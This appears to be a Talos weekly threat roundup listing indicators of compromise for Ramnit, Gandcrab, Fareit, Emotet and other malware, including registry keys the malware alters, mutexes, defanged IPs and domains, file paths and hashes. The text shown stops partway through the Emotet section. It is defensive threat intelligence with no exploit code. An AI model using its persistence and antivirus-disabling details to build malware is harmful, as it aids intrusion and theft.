Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 15 and Oct. 22. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.
As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org , or ClamAV.net .
For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.
The most prevalent threats highlighted in this roundup are:
Threat Name Type Description Win.Dropper.Ramnit-9902254-0
Dropper
Ramnit is a banking trojan that monitors web browser activity on an infected machine and collects login information from financial websites. It also has the ability to steal browser cookies and attempts to hide from popular antivirus software.
Win.Dropper.Gandcrab-9902378-0
Dropper
Gandcrab is ransomware that encrypts documents, photos, databases and other important files using the file extension ".GDCB," ".CRAB" or ".KRAB". Gandcrab is spread through both traditional spam campaigns, as well as multiple exploit kits, including Rig and Grandsoft.
Win.Dropper.Fareit-9902448-1
Dropper
The Fareit trojan is primarily an information stealer with functionality to download and install other malware.
Win.Dropper.Emotet-9902435-0
Dropper
Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.TrickBot-9902436-0
Dropper
TrickBot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Trojan.Xpiro-9902727-1
Trojan
Expiro is a known file infector and information-stealer that hinders analysis with anti-debugging and anti-analysis tricks.
Win.Dropper.ZBot-9902454-1
Dropper
Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods such as key-logging and form-grabbing.
Win.Dropper.Remcos-9903276-0
Dropper
Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Trojan.Tofsee-9903049-1
Trojan
Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator's control.
Threat Breakdown Win.Dropper.Ramnit-9902254-0 Indicators of Compromise IOCs collected from dynamic analysis of 17 samples Registry Keys Occurrences <HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159
11
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusOverride
6
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
6
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallDisableNotify
6
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallOverride
6
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
6
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UacDisableNotify
6
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: EnableFirewall
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DoNotAllowExceptions
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DisableNotifications
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Start
6
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION
Value Name: jfghdug_ooetvtgk
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: JudCsgdy
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
6
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Defender
6
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Userinit
6
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Userinit
6
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\WMI\AUTOLOGGER\EVENTLOG-SECURITY
Value Name: OwningChannel
3
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\WMI\SECURITY
Value Name: 0e66e20b-b802-ba6a-9272-31199d0ed295
3
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\WMI\AUTOLOGGER\EVENTLOG-SYSTEM
Value Name: Start
3
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\WMI\AUTOLOGGER\EVENTLOG-SYSTEM
Value Name: BufferSize
3
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\WMI\AUTOLOGGER\EVENTLOG-SYSTEM
Value Name: MinimumBuffers
3
Mutexes Occurrences {<random GUID>}
6
t4r_veye2_svc
2
Frz_State
1
Sandboxie_SingleInstanceMutex_Control
1
MicrosoftVirtualPC7UserServiceMakeSureWe'reTheOnlyOneMutex
1
EYnyOgBw
1
<32 random hex characters>
1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 195[.]201[.]179[.]207
6
142[.]250[.]176[.]206
6
118[.]107[.]0[.]66
5
87[.]106[.]190[.]153
3
172[.]217[.]13[.]78
2
217[.]182[.]195[.]31
2
46[.]165[.]221[.]144
1
31[.]44[.]184[.]117
1
138[.]197[.]160[.]52
1
211[.]114[.]97[.]47
1
5[.]45[.]118[.]216
1
139[.]59[.]15[.]217
1
5[.]45[.]124[.]183
1
138[.]197[.]77[.]223
1
5[.]45[.]82[.]108
1
138[.]197[.]187[.]220
1
5[.]45[.]120[.]46
1
138[.]197[.]153[.]82
1
138[.]197[.]78[.]231
1
139[.]59[.]103[.]6
1
211[.]114[.]180[.]221
1
211[.]114[.]229[.]118
1
138[.]197[.]170[.]180
1
5[.]45[.]147[.]152
1
211[.]114[.]48[.]226
1
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences google[.]com
6
eukbhtrjtp[.]com
5
fkbpvfnbhfwedagussg[.]com
5
samtbqdmwqnp[.]com
5
tinjahjgsutmdj[.]com
5
cgvnwyfmh[.]com
5
hvvflaobcvavhxcvrx[.]com
5
aoylllsqihxxrvs[.]com
5
ydwqpuwjpxij[.]com
5
b18w187yebsoi[.]com
5
bnmokfrjpylxhvmwx[.]com
5
gssbjwhoose[.]com
5
g283yr84iri4i[.]com
1
ctmqakpbxbtk[.]com
1
rgmxtsagmcvrrkofdkn[.]com
1
snxplvbkwja[.]com
1
ypfptjsuthmaaebx[.]com
1
wbrmgnjowapb[.]com
1
acncblsmbotliccnt[.]com
1
rbpyoxmokgfdpphixk[.]com
1
qnpuwhcfaqpsmrns[.]com
1
nhqtfnep[.]com
1
tbkgkcohpmbwrdsreyf[.]com
1
hncidhweh[.]top
1
Files and or directories created Occurrences %LOCALAPPDATA%\bolpidti
6
%LOCALAPPDATA%\bolpidti\judcsgdy.exe
6
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\judcsgdy.exe
6
%TEMP%\guewwukj.exe
3
%TEMP%\yowhywvr.exe
3
%HOMEPATH%\Local Settings\Application Data\hmqphkgx\pseqpmjy.exe
3
%HOMEPATH%\Local Settings\Application Data\jpnfmrvn.log
3
%HOMEPATH%\Start Menu\Programs\Startup\pseqpmjy.exe
3
%ProgramData%\wtvakgao.log
3
%APPDATA%\b.exe
2
%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup\Tray Notifier.lnk
2
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Tray Notifier.lnk
2
%APPDATA%\a.txt
2
%APPDATA%\wndsvc.exe
2
%APPDATA%\wndsvc.exe:Zone.Identifier
2
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp
2
%APPDATA%\s1qoaKDO.tmp
1
%TEMP%\E8E.tmp
1
%LOCALAPPDATA%\ReasonUsers
1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\ReasonUsers.lnk
1
%APPDATA%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\times.exe
1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\SmsWebcam.lnk
1
%System32%\Tasks\bb2Jzhmo
1
%TEMP%\5D6.tmp
1
%TEMP%\updda460960.bat
1
*See JSON for more IOCs
File Hashes 0cff5fe927152407b13bb316bc73a6ff1660ed9795976250f3c04b4bd8a7c942
112644019aa9049574dbbee6581c8756eb33f53f9c73aa8b0eee66be8ba7abae
11de8d1f1d1a9233c3a114ebc33e0eec38e0b23eb6440d2c300560732dbc2c17
1ff11b2c92356f67a73be857da3e70f6e7c0372d74fb6bb92f3ad30b1935ade6
2b57524c9a1f4974898faec82ea984a843afc3a1a6994c1bf54fa4d4fd7e0317
33d7dc13223e357149634b28f27ddd0b0462a497b5753097fdb60e42bf815800
3af93f1e00d2f87da3925b64e9b0b0ea4a587a3d023a32ab5976e5581da75167
425014117ff678b36c5a5642107f8accf4bf46bb0af334851b74582f35097489
7d0916701369a96486377258ccdff9b1d2eb59da8966ab2055c3b8902ba6b512
7f597cf518ae615103b777bacb08f4c7093dccca0c14c6a7d146b5f3cf8a305b
85f6deea4e649e82c5a0c3dea0d9aeb4a9e997394bc9653810e8244d472ed5ea
945b8493a18cb0ade1ad24c37b6afcc442d8ddfacc0ee8d64701696af4cceffd
ad8167d8b0da62a12c472f88c3001e37dcdbd4fe6b75868b8a6def2486d5e498
af14cb02399aac0cf30d710f7517ca6e435cd5dbf1bf9856c8ea09ffda25b13e
baf537b78eb15c577a4be5197878b00499220b4fae5eae120f358acb0675c73c
d33d6382b76ae22be57533b508459702550a60c62377e4ae3c5d81c9d1211de4
d6e414b97f7bade136dfd270bb20ee7e03cd0174a63ae4d629bd3f3399d3285fCoverage Product Protection Secure Endpoint
Cloudlock
N/A
CWS
Email Security
Network Security
Stealthwatch
N/A
Stealthwatch Cloud
N/A
Secure Malware Analytics
Umbrella
WSA
Screenshots of Detection Secure Endpoint
Secure Malware Analytics
MITRE ATT&CK Win.Dropper.Gandcrab-9902378-0 Indicators of Compromise IOCs collected from dynamic analysis of 23 samples Registry Keys Occurrences <HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159
23
<HKCU>\Software\Microsoft\<random, matching '[A-Z][a-z]{3,11}'>
4
<HKCU>\SOFTWARE\KEYS_DATA
3
<HKCU>\SOFTWARE\KEYS_DATA\DATA
3
<HKCU>\SOFTWARE\KEYS_DATA\DATA
Value Name: public
3
<HKCU>\SOFTWARE\KEYS_DATA\DATA
Value Name: private
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Windows\system32\rundll32.exe
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\ZITRAXI
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\ZITRAXI
Value Name: Impersonate
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\ZITRAXI
Value Name: Asynchronous
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\ZITRAXI
Value Name: MaxWait
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\ZITRAXI
Value Name: DllName
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\ZITRAXI
Value Name: Startup
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: zitraxi
1
Mutexes Occurrences 10853E93BDB42AC8C03259A196091EB198B68E3C
3
A16467FA-7343A2EC-6F235135-4B9A74AC-F1DC8406A
3
Global\8B5BAAB9E36E4507C5F5.lock
3
Frz_State
3
Sandboxie_SingleInstanceMutex_Control
3
D88B4D3CAE375DED14F392DBA85F311F98B68E3C
3
<random, matching '[A-Z0-9]{14}'>
3
<32 random hex characters>
3
A9ZLO3DAFRVH1WAE
1
B81XZCHO7OLPA
1
BSKLZ1RVAUON
1
F-DAH77-LLP
1
GJLAAZGJI156R
1
I-103-139-900557
1
J8OSEXAZLIYSQ8J
1
LXCV0IMGIXS0RTA1
1
MKS8IUMZ13NOZ
1
OLZTR-AFHK11
1
OPLXSDF19WRQ
1
PLAX7FASCI8AMNA
1
RGT70AXCNUUD3
1
TXA19EQZP13A6JTR
1
VSHBZL6SWAG0C
1
chimvietnong
1
drofyunfdou
1
*See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 160[.]72[.]43[.]240/31
6
139[.]59[.]208[.]246
3
130[.]255[.]73[.]90
3
185[.]121[.]177[.]177
3
213[.]186[.]33[.]3
3
192[.]42[.]116[.]41
3
178[.]210[.]89[.]119
3
193[.]183[.]98[.]66
3
5[.]135[.]183[.]146
3
185[.]121[.]177[.]53
3
169[.]239[.]202[.]202
3
144[.]76[.]133[.]38
3
51[.]254[.]25[.]115
3
51[.]255[.]48[.]78
3
39[.]107[.]34[.]197
3
178[.]238[.]37[.]163
3
160[.]72[.]43[.]242
3
185[.]230[.]63[.]171
3
87[.]236[.]16[.]107
3
154[.]213[.]249[.]125
3
146[.]148[.]130[.]86
3
213[.]238[.]183[.]214
3
3[.]64[.]163[.]50
3
34[.]102[.]136[.]180
2
104[.]21[.]40[.]198
2
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences www[.]msftncsi[.]com
6
d3s1[.]me
3
kiyanka[.]club
3
proxy-exe[.]bit
3
6chen[.]cn
3
acbt[.]fr
3
alem[.]be
3
asl-company[.]ru
3
bellytobabyphotographyseattle[.]com
3
boatshowradio[.]com
3
cevent[.]net
3
dna-cp[.]com
3
goodapd[.]website
3
oceanlinen[.]com
3
perovaphoto[.]ru
3
pp-panda74[.]ru
3
wpakademi[.]com
3
www[.]billerimpex[.]com
3
www[.]cakav[.]hu
3
www[.]fabbfoundation[.]gm
3
www[.]macartegrise[.]eu
3
www[.]mimid[.]cz
3
www[.]perfectfunnelblueprint[.]com
3
www[.]poketeg[.]com
3
www[.]wash-wear[.]com
3
*See JSON for more IOCs
Files and or directories created Occurrences \$Recycle.Bin\KRAB-DECRYPT.txt
3
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\KRAB-DECRYPT.txt
3
\KRAB-DECRYPT.txt
3
%HOMEPATH%\AppData\KRAB-DECRYPT.txt
3
%HOMEPATH%\Documents\OneNote Notebooks\Notes\KRAB-DECRYPT.txt
3
%HOMEPATH%\Documents\OneNote Notebooks\Personal\KRAB-DECRYPT.txt
3
%HOMEPATH%\Documents\Outlook Files\KRAB-DECRYPT.txt
3
%HOMEPATH%\Downloads\KRAB-DECRYPT.txt
3
%HOMEPATH%\Favorites\KRAB-DECRYPT.txt
3
%HOMEPATH%\Favorites\Links for United States\KRAB-DECRYPT.txt
3
%HOMEPATH%\Favorites\Links\KRAB-DECRYPT.txt
3
%HOMEPATH%\Favorites\MSN Websites\KRAB-DECRYPT.txt
3
%HOMEPATH%\Favorites\Microsoft Websites\KRAB-DECRYPT.txt
3
%HOMEPATH%\Favorites\Windows Live\KRAB-DECRYPT.txt
3
%HOMEPATH%\KRAB-DECRYPT.txt
3
%HOMEPATH%\Links\KRAB-DECRYPT.txt
3
%HOMEPATH%\Saved Games\KRAB-DECRYPT.txt
3
%HOMEPATH%\Searches\KRAB-DECRYPT.txt
3
\Users\Default\AppData\KRAB-DECRYPT.txt
3
\Users\Default\AppData\Local\KRAB-DECRYPT.txt
3
\Users\Default\AppData\Local\Microsoft\KRAB-DECRYPT.txt
3
\Users\Default\AppData\Local\Temp\KRAB-DECRYPT.txt
3
\Users\Default\AppData\Roaming\KRAB-DECRYPT.txt
3
\Users\Default\AppData\Roaming\Media Center Programs\KRAB-DECRYPT.txt
3
\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\KRAB-DECRYPT.txt
3
*See JSON for more IOCs
File Hashes 0a7114a5b5480c036d22f76e0fd33db3f0c7191f3aeb8d096581b2f526f2b5a1
1340eafe83ac4a4d6b8f3226b583bbd5edd7af45a30c00fad1521a39dd5bb9d4
13a4a7f38a8e849815b34cbe654ca73728d26faedf456a3818ce1705d15217c6
17aa577d8e35cc608cdc1f4e7aa0ba65bd33c3e2a085057abc5f9faa064c6552
1d078548bd0831296225c4d7288e871ff82140b8f0236e0ae52b6c1e5627d21c
2430a8a6aa26af7e7b60e5ea352b5fedf22e6c9363b08c96cf0306a0d4acc78c
37b9ce88b9f4178c98d3e462f2088a1b272d0518af479d169b3bca1d6fe17dd7
3dab93e1326fd1b6f530a11825b2e1e2c48ae0d683d12db5cb04c9642bd99a94
413299bb192b28b7cfa3077df0d7fd46a0a10db0652b1078469ff1fff78e735c
78d84c752ad22c00b38e3006e7eb09837105832847d667294f25db4e0c77ac27
8a4132a7f18132622fd17a947521fc28ebad39edad15e5d394c9e22460540822
8adf74dc287c0d13b8966daac4767bdb3686d8e1ca85d57905cedc370a640abe
9a6ff649815ddec7f5ce9f33aa61a6db5434b345f59e375ed50342fc5bf97a92
9aac9eea26b498da61c89648d8c61cc56e3a6dd8b9b646aefb7a1947f5aaa160
a29b9e61399684cf8c5e23934e842c0be6e283e1c5025a5ac3bcad8771a94eed
a2ae4b6520be8dcf4bc256d2c9b8e4f4ffc1e8e366c2dd1e30b4007c7a2db6a7
ba737e1ebf646e8f57c06b87219a1a2298d1e4824aa4610366bdd17a8a9fa5a3
be37e0004ee4966d5dd3fb3b14129c36bb0ba4eda9b20fb9e17c2d2a29c79e68
d304cdcb5bfce6f0ec28be4e62d0b2acd22ef2cd16773a294354a2adbaba6a7f
daaa56b96f4a391029cfbe2e60eec2f455d97e06f5c11211f6d6856473f3af38
eb7157fbba3c2de316e329f1863a6afdcb6c28a0af399e1b25d74ed28f7ab928
f15086bd98d7efb31e620bb7d950743b456b24ad299ce6b732b87d3920076ced
f40fdb921a0d2b21f65896eeaebf2b0984f6efccd791bbc0e9004180938fa3efCoverage Product Protection Secure Endpoint
Cloudlock
N/A
CWS
Email Security
Network Security
Stealthwatch
N/A
Stealthwatch Cloud
N/A
Secure Malware Analytics
Umbrella
WSA
Screenshots of Detection Secure Endpoint
Secure Malware Analytics
MITRE ATT&CK Win.Dropper.Fareit-9902448-1 Indicators of Compromise IOCs collected from dynamic analysis of 41 samples Registry Keys Occurrences <HKCU>\SOFTWARE\WINRAR
41
<HKCU>\SOFTWARE\WINRAR
Value Name: HWID
41
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159
40
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9
Value Name: F
36
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5
Value Name: F
36
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC
Value Name: F
36
<HKCU>\SOFTWARE\MICROSOFT\XEIJC
1
<HKCU>\SOFTWARE\WINRAR
Value Name: FEB6956A7223D836BB5242CE8C4DA42F
1
<HKCU>\SOFTWARE\MICROSOFT\XEIJC
Value Name: b10jih9
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: {2EC645E8-BA31-AD44-55BA-04D54CAC27C8}
1
<HKCU>\SOFTWARE\MICROSOFT\XEIJC
Value Name: 1gi8gfdj
1
<HKCU>\SOFTWARE\MICROSOFT\XEIJC
Value Name: egg5ac3
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTPAGE
Value Name: StartMenu_Balloon_Time
1
Mutexes Occurrences GLOBAL\{<random GUID>}
1
Local\{<random GUID>}
1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 66[.]228[.]61[.]192
14
173[.]246[.]103[.]26
5
129[.]232[.]157[.]131
2
85[.]236[.]50[.]204
2
213[.]9[.]21[.]111
2
92[.]204[.]55[.]63
2
82[.]145[.]53[.]14
2
68[.]171[.]208[.]119
2
85[.]13[.]145[.]82
2
85[.]13[.]133[.]152
2
85[.]128[.]226[.]193
2
81[.]169[.]145[.]164
1
198[.]49[.]74[.]2
1
217[.]160[.]0[.]176
1
217[.]160[.]0[.]55
1
107[.]167[.]110[.]217
1
81[.]169[.]145[.]70
1
83[.]111[.]92[.]83
1
173[.]192[.]39[.]2
1
71[.]42[.]56[.]253
1
185[.]230[.]63[.]186
1
64[.]219[.]114[.]114
1
34[.]117[.]168[.]233
1
198[.]54[.]120[.]80
1
50[.]87[.]236[.]238
1
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences 13[.]zabakarvester[.]net
39
13[.]aboutcoverletter[.]com
27
13[.]chaircomplete[.]com
27
14[.]onlinecollegecomplete[.]com
27
alienwlkp[.]edomena[.]pl
22
tlumaczeniaekspresowe[.]home[.]pl
22
13[.]lomerdaster[.]net
14
alino-is[.]de
2
a-is[.]eu
2
livechat[.]tidyhosts[.]com
2
securityadvisors[.]co[.]za
2
mega1[.]co[.]uk
2
ftp[.]spooncupftvtigercrm[.]com
2
vt-nord[.]de
2
geeksleaks[.]com
2
videotronic-nord[.]de
2
rapmagazine[.]org
2
apollo-spa[.]cz
2
www[.]it-systemer[.]de
2
www[.]steinewerfer[.]net
2
ftp[.]studiosf[.]nazwa[.]pl
2
www[.]lichtseminare[.]at
2
www[.]asteriskocomunicazione[.]it
1
carmodyminefreight[.]com[.]au
1
www[.]speakintmob[.]co[.]uk
1
*See JSON for more IOCs
Files and or directories created Occurrences %TEMP%\1640958943.bat
1
%TEMP%\1640992374.bat
1
%TEMP%\1640933967.bat
1
%TEMP%\tmp4d0a556d.bat
1
%HOMEPATH%\AppData\LocalLow\yntejo.avj
1
%APPDATA%\Nuji
1
%APPDATA%\Nuji\cuaw.exe
1
%TEMP%\1641735844.exe
1
%TEMP%\1641746452.bat
1
%TEMP%\1641766935.bat
1
%TEMP%\1641747357.bat
1
%TEMP%\1641776139.bat
1
%TEMP%\1641777902.bat
1
%TEMP%\1641799554.bat
1
%TEMP%\1641718543.bat
1
%TEMP%\1641721070.bat
1
%TEMP%\1641762208.bat
1
%TEMP%\1641713614.bat
1
%TEMP%\1641787449.bat
1
%TEMP%\1641779306.bat
1
%TEMP%\1641792378.bat
1
%TEMP%\1641749400.bat
1
%TEMP%\1641761818.bat
1
%TEMP%\1641807027.bat
1
%TEMP%\1641823438.bat
1
*See JSON for more IOCs
File Hashes 01b9c80cbc23357ad02ef1fb05bd9d5e5916cc5ab808aa0def218fe519be8d43
02722c10dc58f9b2067404d008e18ad429396514cd037942600e108ed4febdbd
081fcd78e960021a2bfa4bada708ef812431f771f0985424aac2aa9668ad2c22
08a06557350cd97da619cba9260a4d0281715b8eb8269586959cccc3fa20989a
0c8ef73034f61f93ffbaeea97bb04d3c87b2bc4e91861e86b4d0e7dcef56aebf
109bd40265a4aa5ff6db3bcc0059b0364e0b58ceec59fd7e467d55ea42516b14
138b5e0e7edeed2696c82ae1ef71f4c4ffebf48a6589dcd9e8741c9b3af28153
13f54c056fce03f8e1a6fb069c057a9a65c05ca8f20e48301aef4912b0ac3316
1617cdeef819ffb40d3abe9419aaad3d463be7bdcbd54371dfd6522678f3a94f
169f3a85b71c5239e03d47850d3fff5fac61f80ede3987fb4deba645446a13ef
1757a503668b6bf98ea5c08cf5212e0f8250e096fad6f53b9200e15ec1d8bdbf
1acc8b1d75558ce9b2e26459cbcd04f4c3d8ae0857413cdd4a400bad7abfbeeb
1f2bfb0c83b338414cfd8eb9ab443e4fd80ebc34207a3d971a2a3f039a26e709
2491c98d653600dac554683495f47b5c9abad6e2e716e0f2957d193a60811aed
251a875fe9b9dc844e4481483df7e5439dc45f809d7f47eb758128767265ecab
2a2fb5aa93881a45a3f5a7fb7143d8e3517aace4b4d554c76ceae4d0d9c67e6d
2abefbea404a0c5a4ef316486cf70004bac7c4c83d26298c30c844a4df4375ad
2b3f36dc99d593b4155347d3b8a8eec235fbcd8ce32500acd6f51088e2b3e8bd
2b446e36ec7c3082024d9ba8522e1582f786714698859ed3cf817fe64ab9bb27
2bd04fbaecec78937aed3c326d1a0b01a43f1049ffc4ffc0757e245c7e8d88f1
2d88b90cd635a3b205415d43f6ad728d577fab6baac8f3cf37a3085fadb34bc6
32efc1239add3205962c8ca13dda0383fcf68e3ebcae2949aa0450bf76d2980e
34dd1729b31e10844399d2dab9f67bae01bb1234c606023699b6444e06c74cb1
36a19b86e0c791010967268165dccfa1262fae7458cb4fcca30d4d5ff5f23e1e
39417c43c256acb5c2c740720b6a749f5438d6cac43f3da26e123eabb4140395*See JSON for more IOCs
Coverage Product Protection Secure Endpoint
Cloudlock
N/A
CWS
Email Security
Network Security
Stealthwatch
N/A
Stealthwatch Cloud
N/A
Secure Malware Analytics
Umbrella
N/A
WSA
N/A
Screenshots of Detection Secure Endpoint
Secure Malware Analytics
MITRE ATT&CK Win.Dropper.Emotet-9902435-0 Indicators of Compromise IOCs collected from dynamic analysis of 19 samples Registry Keys Occurrences <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPECSYSTEM
Value Name: Type
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPECSYSTEM
Value Name: Start
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPECSYSTEM
Value Name: ErrorControl
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPECSYSTEM
Value Name: ImagePath
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPECSYSTEM
Value Name: DisplayName
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPECSYSTEM
Value Name: WOW64
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPECSYSTEM
Value Name: ObjectName
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPECSYSTEM
Value Name: Description
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPECSYSTEM
19
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159
19
Mutexes Occurrences Global\I98B68E3C
19
Global\M98B68E3C
19
MC8D2645C
19
<random, matching [a-zA-Z0-9]{5,9}>
19
Global\I669ABD8E
1
Global\M669ABD8E
1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 193[.]169[.]54[.]12
15
80[.]82[.]115[.]164
15
80[.]86[.]91[.]232
15
37[.]187[.]4[.]178
15
104[.]130[.]204[.]251
10
71[.]244[.]60[.]231
5
119[.]59[.]124[.]163
4
37[.]97[.]135[.]82
4
69[.]45[.]19[.]251
4
217[.]13[.]106[.]16
4
37[.]187[.]57[.]57
4
File Hashes 1a0189f6a4c31bc00909c850265c928120d57c8768d1e091662b642f35c08268
3ba38323c281787a5175d7772cbf0139026f6843a0147b63dd1b18145fc0474d
448113f0563590c58482efcd3c794b8755727eb2cdd7a3297c396844193f286c
57c85664edd6e29f641505f6c82f8d6efd3b73ac1429899c7653c55fbed30ec2
72a22f8ea82307a0635e07ede2129068341af94259266cea73d10f3ee8eba7b8
83ac076244f4900abf50fb3aa34228a13fb120b001d6f17536ee326cca59b7e2
88e41b2db7e3a032472be09c6b1fa871501c0a2cab0117dbb01eafb347163157
a238d13c75820008e2ecaaaedd56e12459f1ac1b12ab1c213f64e450caf54562
a4af6f5ce43a514fddb746a73bcade17e4cfcece2e0831dab896ff41c284cfb0
a6855b6a9bf3bf51dee19aef1b5ab480936c60b3014f5653dd9e0fa31a4d7b34
ab6dc52e9af197e5065310e3f10de1a478aa9fb9e603c3cb22538981130361a6
b03e6c6b6838bdac6f934561de491fd2c90b7420984e10320f72df861bff2cc9
